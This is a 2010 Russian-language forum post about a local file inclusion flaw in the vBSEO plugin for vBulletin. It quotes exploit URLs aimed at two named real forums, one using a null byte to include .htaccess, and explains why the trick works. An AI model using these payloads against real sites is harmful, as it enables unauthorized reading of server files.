19.01.2010, 23:53
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от mailbrush
Вот:
Код:
http://myp2pforum.eu/vbseo.php?vbseoembedd=1&vbseourl=images/statusicon/post_old.gif
PS: А зачем там нулл-байт, да еще и .php в конце?
Хм, а ведь это вариант использования уязвимости без параметра vbseoembedd. В новой версии правда всё равно не работает.
А нулл-байт и .php понятно зачем - vbseo.php думает, что это php файл и инклудит его, а там расширение обрезается и инклудится то, что до нулл-байта.
Но если аватары в бд, это ничего не даёт.
Пример (Isis, превед  :
Код:
http://forum.xeka.ru/vbseo.php?vbseourl=.htaccess%00.php
Последний раз редактировалось Root-access; 20.01.2010 в 00:39..
|
|
|